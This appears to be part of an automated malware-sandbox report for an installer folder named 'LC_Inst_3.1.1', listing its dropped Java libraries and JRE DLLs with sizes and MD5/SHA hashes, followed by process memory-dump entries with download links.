C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jfoenix.jar

Filesize
2.3MB

MD5
6316f84bc78d40b138dab1adc978ca5d

SHA1
b12ea05331ad89a9b09937367ebc20421f17b9ff

SHA256
d637e3326f87a173abd5f51ac98906a3237b9e511d07d31d6aafcf43f33dac17

SHA512
1cdca01ed9c2bc607207c8c51f4b532f4153e94b3846308332eccae25f9c5fddf8279e3063f44a75dd43d696eab0f9f340f9bf2f3ec805ab0f2f1de5135a426c

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jkeymaster.jar

Filesize
51KB

MD5
21a017201cbb16ae0546069d4371f1c2

SHA1
9f1e8c9341a8a0c51299b961c4f6c7661c822756

SHA256
a2d68aaf08f15ff1c3b9b224641e8b4c35ee30b10f655d6420571b0429f19c87

SHA512
6c65740c17de72ba7b0df95aa29d095a1502f298924c63f364328f6fbb38920e92e0246d28a642f7c9fe3ab582341e607b0ae01515d470b4595d698ce81363d6

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jna.jar

Filesize
1.0MB

MD5
34d3537524a6c8c134e840e7be601569

SHA1
cb208278274bf12ebdb56c61bd7407e6f774d65a

SHA256
c4dadeeecaa90c8847902082aee5eb107fcf59c5d0e63a17fcaf273c0e2d2bd1

SHA512
d38d124f5d2c227da57b0473bb37709a4d9f6fbcf5b6da3a6e15e2a90e5c2980d9dc649cdaeecb08b376dead73267128c1972d9e25ecc243424b8f6e6f4e67b3

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jphp-app-framework.jar

Filesize
103KB

MD5
0c8768cdeb3e894798f80465e0219c05

SHA1
c4da07ac93e4e547748ecc26b633d3db5b81ce47

SHA256
15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669

SHA512
35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jphp-core.jar

Filesize
464KB

MD5
7e5e3d6d352025bd7f093c2d7f9b21ab

SHA1
ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57

SHA256
5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a

SHA512
c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jphp-desktop-ext.jar

Filesize
16KB

MD5
b50e2c75f5f0e1094e997de8a2a2d0ca

SHA1
d789eb689c091536ea6a01764bada387841264cb

SHA256
cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23

SHA512
57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jphp-desktop-hotkey-ext.jar

Filesize
5KB

MD5
22acc05e1efc1d4c5faa0359ce725d47

SHA1
458e7f911d024a3d786e76f256b017b0901f48f8

SHA256
c55c267d954ec9f24226780ee49fa7e1bc2baec3af6bfc0caa6cc1b49d8ca90c

SHA512
b11754f5337a73d317ae311fd4c20c0b548e1163107b741cc9e6d4d9027a8f99551e3184a83f9ad20098092e87ef1741c1e437058b7cac92727124589c303ef5

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jphp-game-ext.jar

Filesize
68KB

MD5
8f952ca7a11355a54305d6e23174aade

SHA1
ddc83e5745daa7ff33afb4095525f2ee22422487

SHA256
cdb830115b087cda78c41f972118c49d899b578e8d562e134740d66e11292034

SHA512
7156879f87c27baa9706eca20f108de45dee71ab3c95247edbd1b5e82f52fe5c8f285dc39b2495b696fb7247ff9b8779c465d95b655a3216928f316ec19e0583

Download Submit
C:\Users\Admin\Downloads\LC_Inst_3.1.1\lib\jphp-gui-ext.jar

Filesize
688KB

MD5
6696368a09c7f8fed4ea92c4e5238cee

SHA1
f89c282e557d1207afd7158b82721c3d425736a7

SHA256
c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4

SHA512
0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

Download Submit
\Users\Admin\Downloads\LC_Inst_3.1.1\jre\bin\client\jvm.dll

Filesize
3.7MB

MD5
39c302fe0781e5af6d007e55f509606a

SHA1
23690a52e8c6578de6a7980bb78aae69d0f31780

SHA256
b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc

SHA512
67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

Download Submit
\Users\Admin\Downloads\LC_Inst_3.1.1\jre\bin\java.dll

Filesize
123KB

MD5
73bd0b62b158c5a8d0ce92064600620d

SHA1
63c74250c17f75fe6356b649c484ad5936c3e871

SHA256
e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30

SHA512
eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

Download Submit
\Users\Admin\Downloads\LC_Inst_3.1.1\jre\bin\verify.dll

Filesize
38KB

MD5
de2167a880207bbf7464bcd1f8bc8657

SHA1
0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7

SHA256
fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3

SHA512
bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

Download Submit
memory/348-2711-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1612-2822-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2777-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2818-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2817-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2816-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2815-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2780-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2825-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2849-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2813-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2888-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2890-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2889-0x0000000000270000-0x000000000027A000-memory.dmp

Filesize
40KB

Download
memory/1612-2896-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2910-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2920-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1612-2921-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download